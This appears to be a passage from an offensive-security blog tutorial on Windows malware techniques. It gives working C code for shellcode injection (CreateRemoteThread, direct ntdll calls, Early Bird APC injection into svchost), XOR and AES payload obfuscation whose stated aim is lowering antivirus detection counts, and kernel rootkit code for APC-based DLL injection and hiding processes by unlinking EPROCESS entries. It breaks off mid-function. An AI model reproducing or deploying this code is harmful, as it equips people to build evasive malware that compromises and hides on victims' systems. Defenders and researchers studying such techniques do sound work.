Alright, RWX memory implementation is fairly straightforward for our intended purpose. It involves searching a process’s private virtual memory space (the userland virtual memory space) for a memory section marked as PAGE_EXECUTE_READWRITE. If such a space is found, it’s returned. If not, the next search address is adjusted to the subsequent memory region (BaseAddress + Memory Region).
To finalize this for code execution, our shellcode must then be relocated to that discovered memory region and executed. An efficient way to achieve this is to resort WinAPI calls, similar to what we demonstrated in the first technique. However, it’s essential to consider the cons of that approach, as discussed above.
int main(int argc, char * argv[])
{
// msfvenom -p windows/x64/exec CMD=notepad.exe -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
int newPid = atoi(argv[1]);
printf("Injecting into pid %d\n", newPid);
HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);
if (!pHandle)
{
printf("Invalid Handle\n");
exit(1);
}
LPVOID remoteBuf = VirtualAllocEx(pHandle, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!remoteBuf)
{
printf("Alloc Fail\n");
exit(1);
}
printf("alloc addr: %p\n", remoteBuf);
WriteProcessMemory(pHandle, remoteBuf, shellcode, sizeof(shellcode), NULL);
CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuf, NULL, 0, NULL);
return 0;
}
Let’s try to move away from them and directly use the undocumented functions within ntdll.dll
in this one we go level lower where we do the syscalls directly.
We need:
- NtAllocateVirtualMemory
- NtWriteVirtualMemory
- NtCreateThreadEx
Since these APIs are not documented by Microsoft, we need to find some external references http://undocumented.ntinternals.net
Let’s look at the definition of an NTAPI
function from the reference link:
NTSYSAPI
NTSTATUS
NTAPI
NtAllocateVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect );
NTSTATUS
is the actual return value, while NTSYSAPI
marks the function as a library import and NTAPI
defines the windows api calling convention. IN
means the function requires it as input, while OUT
means that the parameter passed in is modified with some return output.
When we prototype the functions, we just need to note the NTAPI
part.
In fact you can also use WINAPI
since the both of them resolve to __stdcall
.
typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);
Here we prototype some function pointers that we’ll map the address of the actual functions in ntdll.dll
to later. You might notice that some types are also missing, for example the POBJECT_ATTRIBUTES
, so let’s find and define them from the references.
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef struct _PS_ATTRIBUTE {
ULONG Attribute;
SIZE_T Size;
union {
ULONG Value;
PVOID ValuePtr;
} u1;
PSIZE_T ReturnLength;
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;
typedef struct _PS_ATTRIBUTE_LIST
{
SIZE_T TotalLength;
PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
Now Let’s load ntdll.dll
and map the functions.
HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");
if (!hNtdll)
{
printf("Load ntdll fail\n");
exit(1);
}
NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");
Finally we can call these functions.
typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);
int main(int argc, char * argv[])
{
// msfvenom -p windows/x64/exec CMD=notepad.exe -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
int newPid = atoi(argv[1]);
printf("Injecting into pid %d\n", newPid);
HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);
if (!pHandle)
{
printf("Invalid Handle\n");
exit(1);
}
HANDLE tHandle;
HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");
if (!hNtdll)
{
printf("Load ntdll fail\n");
exit(1);
}
NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");
void * allocAddr = NULL;
SIZE_T allocSize = sizeof(shellcode);
NTSTATUS status;
status = NtAllocateVirtualMemory(pHandle, &allocAddr, 0, (PULONG)&allocSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
printf("status alloc: %X\n", status);
printf("alloc addr: %p\n", allocAddr);
status = NtWriteVirtualMemory(pHandle, allocAddr, shellcode, sizeof(shellcode), NULL);
printf("status write: %X\n", status);
status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, NULL, pHandle, allocAddr, NULL, 0, 0, 0, 0, NULL);
printf("status exec: %X\n", status);
return 0;
}
So, if you decide to upload this to antivirus engines (which I don’t recommend, but the choice is yours), you may see or even more :
Like I said, MSF shellcode is a dead giveaway, but let’s switch things up and try something different. Time to dust off some classic techniques that never go out of style. I’m talking XOR encryption, a method you’re probably familiar with when it comes to encrypting shellcode.
When XOR encryption is used on shellcode, a key is carefully chosen to XOR each byte of the shellcode. To decrypt it, you just apply the same key again, XOR-ing each byte once more. This reverses the process and restores the original shellcode.
However, it’s worth noting that XOR encryption is child’s play for attackers who already know the key. If you’re up for a challenge, check out the one I posted a while back ReverseMe Cipher which involves XOR encryption.
As a general rule, though, it’s smarter to combine XOR encryption with other techniques for added complexity.
So first we wanna remove strings and debug symbols, Running the command strings
on our exe reveals strings such as “NtCreateThreadEx”, which may lead to AV detection.
We can remove these strings by again XOR encrypting them and decrypting during runtime, First we start by the function responsible for encryption and decryption
unsigned char * rox(unsigned char *, int, int);
unsigned char * rox(unsigned char * data, int dataLen, int xor_key)
{
unsigned char * output = (unsigned char *)malloc(sizeof(unsigned char) * dataLen + 1);
for (int i = 0; i < dataLen; i++)
output[i] = data[i] ^ xor_key;
return output;
}
This Function can be used for encryption and also be used for decryption by applying the same XOR operation. If you XOR the encrypted data with the same xor_key
, it will revert to the original data, just formats encrypted shellcode nicely so we can copy and paste, and we only need the encrypt function in our actual injector.
const char* ntdll_str = (const char*)ntdll;
const char* navm_str = (const char*)navm;
const char* nwvm_str = (const char*)nwvm;
const char* ncte_str = (const char*)ncte;
So like we said NtCreateThreadEx.” These strings can be indicative of the program’s functionality and may lead to antivirus (AV), One way to obfuscate these strings and make them less detectable is to XOR encrypt them, and then decrypt them during runtime when they are needed.
unsigned char ntdll_data[] = {0x3d, 0x27, 0x37, 0x3f, 0x3f, 0x7d, 0x37, 0x3f, 0x3f, 0x53};
unsigned char *ntdll = rox(ntdll_data, 10, 0x53);
Let’s use Virustotal again and check the detection rate.
Well, going from 27 detections down to 9 is indeed a notable improvement, but it’s essential to recognize that this level of evasion is still relatively basic, especially when relying on tools like msfvenom
to achieve our goals.
Alright time for a new code Injection Technique “Early Bird” This Was used by group goes by APT33 How this works Simply it takes advantage of the application threading process that happens when a program executes on a computer. In other words, attackers inject malware code into legitimate process threads in an effort to hide malicious code inside commonly seen and legitimate processes.
We gone use functions like VirtualAllocEx
, WriteProcessMemory
, QueueUserAPC
, CreateProcessW
, and ResumeThread
By this time Before injecting the shellcode we a employs an AES decryption routine, The decryption process uses the Cryptography API (CryptAcquireContextW) functions to decrypt the payload using a predefined key.
int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
BOOL CryptAcquire = CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
if (CryptAcquire == false) {
//printf("CryptAcquireContextW Failed: %d\n", GetLastError());
return -1;
}
BOOL CryptCreate = CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);
if (CryptCreate == false) {
//printf("CryptCreateHash Failed: %d\n", GetLastError());
return -1;
}
BOOL CryptHash = CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);
if (CryptHash == false) {
//printf("CryptHashData Failed: %d\n", GetLastError());
return -1;
}
BOOL CryptDerive = CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);
if (CryptDerive == false) {
//printf("CryptDeriveKey Failed: %d\n", GetLastError());
return -1;
}
BOOL Crypt_Decrypt = CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);
if (Crypt_Decrypt == false) {
//printf("CryptDecrypt Failed: %d\n", GetLastError());
return -1;
}
CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);
return 0;
}
The AES decryption routine ensures that the injected shellcode is in its original, unencrypted form, which is essential for executing it within the target process. This decryption process allows attackers to conceal the true nature of their payload until it is actively executed in the target process’s thread.
Next CreateProcessW
pfnCreateProcessW pCreateProcessW = (pfnCreateProcessW)GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "CreateProcessW");
if (pCreateProcessW == NULL) {
// Handle error if the function cannot be found
}
STARTUPINFOW si;
PROCESS_INFORMATION pi;
// Clear out startup and process info structures
RtlSecureZeroMemory(&si, sizeof(si));
si.cb = sizeof(si;
RtlSecureZeroMemory(&pi, sizeof(pi));
std::wstring pName = L"C:\\Windows\\System32\\svchost.exe";
HANDLE pHandle = NULL;
HANDLE hThread = NULL;
DWORD Pid = 0;
BOOL cProcess = pCreateProcessW(NULL, &pName[0], NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
The CreateProcessW
function is invoked to create a new process, which, in this case, is intended to execute the svchost.exe
application. However, a critical parameter here is CREATE_SUSPENDED
, which is set to TRUE
, After successfully creating the suspended process, the code retrieves the process and thread handles. These handles are crucial for further manipulation of the newly created process.
pHandle = pi.hProcess;
hThread = pi.hThread;
Pid = pi.dwProcessId;
With the suspended process and its associated handles in place, now we ready to proceed with the code injection, which involves injecting shellcode into the memory space of the newly created process.
Creating a suspended process provides an ideal opportunity to inject code and manipulate the process without raising immediate suspicion.
In the next steps, we will proceed to inject the shellcode into the suspended process, ultimately leading to its execution within the context of the target process’s thread, However Before injecting the shellcode, memory space is allocated within the target process to accommodate the injected code. This allocation is done using the VirtualAllocEx
function.
LPVOID memAlloc = pVirtualAllocEx(pHandle, 0, scSize, MEM_COMMIT, PAGE_EXECUTE_READ);
With the shellcode successfully injected into the target process’s memory, the code prepares for its execution. This is done using the QueueUserAPC
function, which enqueues the shellcode for execution within the context of a specific thread within the target process.
if (pQueueUserAPC((PAPCFUNC)memAlloc, hThread, NULL)) {
pResumeThread(hThread);
}
Now, let’s verify the success of our concealment strategy by injecting the shellcode into a suspended process and manipulating the memory space within the context of the process’s thread.
Among the initial 72 detections, we’ve successfully narrowed it down to just 5. We started with 27 detections, which dropped to 9, and now we’re down to only 5. Sure, we could keep going, and I’m confident we’ll eventually hit zero, but here’s the key takeaway: evasion doesn’t end here.
Evasion is just the beginning once you have a foothold in the system. The real challenge lies in how far you can move without triggering alarms or relying on well-known techniques in your arsenal, like Mimikatz. Once you’ve gained access and things start getting detected, the whole “undetected” part is compromised.
The trick? Having a diverse set of techniques in your arsenal. Don’t be an amateur. Just because an AV engine doesn’t detect your payload right away doesn’t mean you’re fully hidden. Keep that in mind.
Now that we’ve covered how to inject and execute code within a target process while evading detection, let’s take things a step further. A rootkit takes these techniques to the next level by embedding itself deep within the system, hiding its presence, and maintaining persistence. In this section, we’ll explore how to write a simple rootkit that hooks system calls, hides processes, and remains undetected.
A Rootkit?
A rootkit is a type of malware designed to hide its presence and maintain unauthorized access to a system. Unlike traditional malware, rootkits operate at a low level, often manipulating the operating system itself to conceal files, processes, and network activity.
Kernel mode rootkits operate at the highest privilege level, known as “Ring 0” in computer architecture. On the other hand, user mode rootkits run at “Ring 3,” which is a lower privilege level.
In order to grasp the workings of kernel mode rootkits, it is essential to have a solid grasp of the basics of Windows device drivers. Essentially, a device driver is a software component responsible for interfacing with hardware and managing Input/Output Request Packets (IRPs).
#include "ntddk.h"
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
DbgPrint("Hello World!");
return STATUS_SUCCESS;
}
This simple driver initializes and prints “Hello World!” to the kernel debugger. However, to perform more complex tasks, we need to understand IRPs.
Understanding I/O Request Packets (IRPs)
IRPs are data structures used to communicate between user-mode programs and kernel-mode drivers. When a user-mode program, for example, writes data to a file handle, the kernel creates an IRP to manage this operation.
To process IRPs effectively, a driver must define functions for handling them. In the provided code, we set up a basic dispatch function that completes the IRP with a success status. In reality, different functions would handle various IRP types.
NTSTATUS OnStubDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
The driver sets up major function pointers, such as IRP_MJ_CREATE
, IRP_MJ_CLOSE
, IRP_MJ_READ
, IRP_MJ_WRITE
, and IRP_MJ_DEVICE_CONTROL
, to handle specific IRP types. In a comprehensive driver, separate functions would handle these major functions.
Creating a File Handle
File handles are essential for user-mode programs to interact with kernel drivers. In Windows, to use a kernel driver from user-mode, the user-mode program must open a file handle to the driver. The driver first registers a named device, and then the user-mode program opens it as if it were a file.
const WCHAR deviceNameBuffer[] = L"\\Device\\MyDevice";
PDEVICE_OBJECT g_RootkitDevice; // Global pointer to our device object
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
RtlInitUnicodeString(&deviceNameUnicodeString, deviceNameBuffer);
ntStatus = IoCreateDevice(DriverObject, 0, &deviceNameUnicodeString, 0x00001234, 0, TRUE, &g_RootkitDevice);
// ...
}
This code registers a device named “MyDevice.” A user-mode program can open this device using a fully qualified path, e.g., \\\\Device\\MyDevice
. This file handle can be used with functions like ReadFile
and WriteFile
, which generate IRPs for communication.
Understanding the interaction between user-mode and kernel-mode through IRPs and file handles is essential when writing effective Windows device drivers, a core concept in the development of kernel mode rootkits.
Remember DLL Injection? Now, let’s explore how rootkits leverage it to inject malicious code or custom device drivers directly into the Windows kernel. By building on the device driver and rootkit concepts we’ve discussed, we can see how kernel-mode DLL injection plays a pivotal role in this process:
Kernel-Mode DLL
The process typically begins with the DriverEntry
function, which is the entry point for our driver. Here’s how we start:
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverobject, IN PUNICODE_STRING pRegister)
{
NTSTATUS st;
PsSetLoadImageNotifyRoutine(&LoadImageNotifyRoutine);
pDriverobject->DriverUnload = (PDRIVER_UNLOAD)Unload;
return STATUS_SUCCESS;
}
In this code snippet, we employ the PsSetLoadImageNotifyRoutine
function to register an image load notification routine. This step is crucial as it allows us to monitor the loading of specific system DLLs, such as kernel32.dll
, into the kernel’s address space.
Plus, we assign the driver’s unload function (pDriverObject->DriverUnload
) to manage cleanup operations when the driver is unloaded. This ensures that any resources or callbacks registered during the driver’s lifecycle are properly released and handled.
Image Load Notification
Our monitoring process hinges on image load notifications. We need to identify when the system loads kernel32.dll
, a fundamental DLL for Windows operating systems. The LoadImageNotifyRoutine
function enables this monitoring.
VOID LoadImageNotifyRoutine(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN PIMAGE_INFO pImageInfo)
{
if (ImageName != NULL)
{
// Check if the loaded image matches the name of kernel32.dll
WCHAR kernel32Mask[] = L"*\\KERNEL32.DLL";
UNICODE_STRING kernel32us;
RtlInitUnicodeString(&kernel32us, kernel32Mask);
if (FsRtlIsNameInExpression(&kernel32us, ImageName, TRUE, NULL))
{
PKAPC Apc;
if (Hash.Kernel32dll == 0)
{
// Initialize the Hash structure and import the function addresses
Hash.Kernel32dll = (PVOID)pImageInfo->ImageBase;
Hash.pvLoadLibraryExA = (fnLoadLibraryExA)ResolveDynamicImport(Hash.Kernel32dll, SIRIFEF_LOADLIBRARYEXA_ADDRESS);
}
// Create an Asynchronous Procedure Call (APC) to initiate DLL injection
Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
if (Apc)
{
KeInitializeApc(Apc, KeGetCurrentThread(), 0, (PKKERNEL_ROUTINE)APCInjectorRoutine, 0, 0, KernelMode, 0);
KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
}
}
}
return;
}
The LoadImageNotifyRoutine
function plays a pivotal role in our DLL injection process. It checks if the ImageName
parameter is not NULL, ensuring that we are actively monitoring loaded images with names. Furthermore, we examine if the loaded image matches the name of kernel32.dll
.
If a match is found, we proceed with initializing the Hash
structure and creating an Asynchronous Procedure Call (APC) using the APCInjectorRoutine
. The APC serves as a mechanism to trigger the DLL injection process into a target process.
These code snippets are instrumental in monitoring and responding to the loading of kernel32.dll
and lay the groundwork for our upcoming discussion on kernel-mode DLL injection.
Unloading the Driver
Before we dive deeper into DLL injection, it’s important to first understand how the driver can be unloaded properly. This is achieved through the Unload
function.
VOID Unload(IN PDRIVER_OBJECT pDriverobject)
{
// Remove the image load notification routine
PsRemoveLoadImageNotifyRoutine(&LoadImageNotifyRoutine);
}
Here, we use the PsRemoveLoadImageNotifyRoutine
function to unregister the previously registered image load notification routine.
DLL Injection
Our exploration of kernel-mode DLL injection is incomplete without understanding how the actual injection takes place. The DllInject
function is the key to achieving this.
NTSTATUS DllInject(HANDLE ProcessId, PEPROCESS Peprocess, PETHREAD Pethread, BOOLEAN Alert)
{
HANDLE hProcess;
OBJECT_ATTRIBUTES oa = { sizeof(OBJECT_ATTRIBUTES) };
CLIENT_ID cidprocess = { 0 };
CHAR DllFormatPath[] = "C:\\foo.dll";
ULONG Size = strlen(DllFormatPath) + 1;
PVOID pvMemory = NULL;
cidprocess.UniqueProcess = ProcessId;
cidprocess.UniqueThread = 0;
// Open the target process
if (NT_SUCCESS(ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, &cidprocess)))
{
// Allocate virtual memory in the target process
if (NT_SUCCESS(ZwAllocateVirtualMemory(hProcess, &pvMemory, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)))
{
// Create an APC (Asynchronous Procedure Call) to load the DLL
KAPC_STATE KasState;
PKAPC Apc;
// Attach to the target process
KeStackAttachProcess(Peprocess, &KasState);
// Copy the DLL path to the target process's memory
strcpy(pvMemory, DllFormatPath);
// Detach from the target process
KeUnstackDetachProcess(&KasState);
// Allocate memory for the APC
Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
if (Apc)
{
// Initialize the APC with the appropriate routine and parameters
KeInitializeApc(Apc, Pethread, 0, (PKKERNEL_ROUTINE)APCKernelRoutine, 0, (PKNORMAL_ROUTINE)Hash.pvLoadLibraryExA, UserMode, pvMemory);
// Insert the APC into the thread's queue
KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
}
// Close the target process handle
ZwClose(hProcess);
}
return STATUS_NO_MEMORY;
}
The DllInject
function serves the critical role of injecting a DLL into a target process in kernel mode. It accepts several parameters, including the ProcessId
of the target process, the PEPROCESS
structure of the target process (Peprocess
), the PETHREAD
structure of the target process (Pethread
), and a Boolean value indicating whether alertable I/O is allowed (Alert
).
The injection process begins with the opening of the target process using ZwOpenProcess
. This step grants us access to the target process with full privileges.
Subsequently, we allocate virtual memory within the target process using ZwAllocateVirtualMemory
. This allocated memory will be used to store the path to the DLL that we intend to inject.
To safely write data into the target process’s memory, we attach to the target process using KeStackAttachProcess
. This attachment is crucial for the integrity and safety of the DLL injection process.
With the attachment in place, we copy the path of the DLL to be injected into the allocated virtual memory within the target process. This path is defined in the DllFormatPath
variable.
After successfully copying the DLL path, we detach from the target process using KeUnstackDetachProcess
.
The heart of the DLL injection lies in the creation of an Asynchronous Procedure Call (APC). This is accomplished by allocating memory for the APC using ExAllocatePool
. The APC is initialized with the necessary routine and parameters.
- The
Apc
structure is initialized usingKeInitializeApc
. - The parameters include the target thread (
Pethread
) and an APC routine (APCKernelRoutine
) responsible for loading the DLL. - Additionally, the normal routine is specified as
Hash.pvLoadLibraryExA
to load the DLL usingLoadLibraryExA
fromkernel32.dll
. - The APC is inserted into the thread’s queue with
KeInsertQueueApc
.
To ensure that DLL injection occurs in a controlled and synchronized manner, we rely on the SirifefWorkerRoutine
and APCInjectorRoutine
functions.
VOID SirifefWorkerRoutine(PVOID Context)
{
DllInject(((PSIRIFEF_INJECTION_DATA)Context)->ProcessId, ((PSIRIFEF_INJECTION_DATA)Context)->Process, ((PSIRIFEF_INJECTION_DATA)Context)->Ethread, FALSE);
KeSetEvent(&((PSIRIFEF_INJECTION_DATA)Context)->Event, (KPRIORITY)0, FALSE);
return;
}
The SirifefWorkerRoutine
function acts as a worker routine responsible for triggering the DLL injection. It accepts a single Context
parameter.
Within this function, the actual DLL injection is initiated by calling the DllInject
function. The parameters provided include the target process’s ID, the process’s EPROCESS
structure, and the process’s ETHREAD
structure. The final parameter, FALSE
, indicates that alertable I/O is not allowed.
Once the DLL injection process completes, an event (KeSetEvent
) is set to signal the successful injection. This event allows us to synchronize the completion of the injection process with other parts of the code.
DLL Injection via APC
The initiation of DLL injection takes place within the APCInjectorRoutine
function, The APCInjectorRoutine
function serves as the orchestrator for our DLL injection process. It commences by initializing a SIRIFEF_INJECTION_DATA
structure, Sf
, and scheduling a worker thread (SirifefWorkerRoutine
) to perform the injection.
VOID NTAPI APCInjectorRoutine(PKAPC Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *SystemArgument1, PVOID *SystemArgument2, PVOID* Context)
{
SIRIFEF_INJECTION_DATA Sf;
RtlSecureZeroMemory(&Sf, sizeof(SIRIFEF_INJECTION_DATA));
ExFreePool(Apc);
// Initialize the SIRIFEF_INJECTION_DATA structure with the necessary information
Sf.Ethread = KeGetCurrentThread();
Sf.Process = IoGetCurrentProcess();
Sf.ProcessId = PsGetCurrentProcessId();
// Initialize an event to synchronize the DLL injection
KeInitializeEvent(&Sf.Event, NotificationEvent, FALSE);
// Initialize a work item to execute the SirifefWorkerRoutine
ExInitializeWorkItem(&Sf.WorkItem, (PWORKER_THREAD_ROUTINE)SirifefWorkerRoutine, &Sf);
// Queue the work item to be executed on the DelayedWorkQueue
ExQueueWorkItem(&Sf.WorkItem, DelayedWorkQueue);
// Wait for the DLL injection to complete
KeWaitForSingleObject(&Sf.Event, Executive, KernelMode, TRUE, 0);
return;
}
These routines work together to schedule and execute the DLL injection into the target process after the kernel32.dll
module is loaded.
Hide Process
A interesting technique we can use in our rootkit is to hide or unlink a target process, which will be hidden from AVs, We won’t be able to see this in the Windows Task Manager.
To hide our process we need to understand a few Windows internal concepts, such as the EPROCESS
data structure in the Windows kernel. EPROCESS
is an opaque data structure in the Windows kernel that contains important information about processes running on the system. The offsets of this large structure change from build to build or version to version.
What we’re interested in is, ActiveProcessLinks
, which is a pointer to a structure called LIST_ENTRY
. We can’t just access this data structure normally like EPROCESS.ActiveProcessLinks
, we have to use PsGetCurrentProcess to get the current EPROCESS
and then add an offset that is version dependent. This is the downside to the EPROCESS
structure. It can make it very hard to have a compatible Windows Kernel rootkit.
kd> dt nt!_EPROCESS
<..redacted...>
+0x000 Pcb : _KPROCESS
+0x3e8 ProcessLock : _EX_PUSH_LOCK
+0x2f0 UniqueProcessId : Ptr64 Void
+0x400 ActiveProcessLinks : _LIST_ENTRY
The LIST_ENTRY
data structure is a doubly-linked list, where FLINK
(forward link) and BLINK
are references to the next and previous elements in the doubly-linked list.
Using the information above, we can hide our process from being shown by manipulating the kernel data structures. To hide our process we can do the following:
- Point the
ActiveProcessLinks.FLINK
ofEPROCESS 1
toActiveProcessLinks.FLINK
ofEPROCESS 3
. - Point
ActiveProcessLinks.BLINK
ofEPROCESS 3
toActiveProcessLinks.BLINK
OFEPROCESS 1
.
This manipulation unlinks the data structure of our target process, EPROCESS 2
, from the doubly-linked list, rendering it invisible to system inspectors.
// Function to hide a process by manipulating kernel data structures
NTSTATUS HideProcess(ULONG pid) {
PEPROCESS currentEProcess = PsGetCurrentProcess();
LIST_ENTRY* currentList = ¤tEProcess->ActiveProcessLinks;
// Get the offsets for UniqueProcessId and ActiveProcessLinks
ULONG uniqueProcessIdOffset = FIELD_OFFSET(EPROCESS, UniqueProcessId);
ULONG activeProcessLinksOffset = FIELD_OFFSET(EPROCESS, ActiveProcessLinks);
ULONG currentPid;
do {
// Check if the current process ID is the one to hide
RtlCopyMemory(¤tPid, (PUCHAR)currentEProcess + uniqueProcessIdOffset, sizeof(currentPid));
if (currentPid == pid) {
// Remove the process from the list
LIST_ENTRY* blink = currentList->Blink;
LIST_ENTRY* flink = currentList->Flink;
blink->Flink = flink;
flink->Blink = blink;
return STATUS_SUCCESS;
}
// Move to the next process
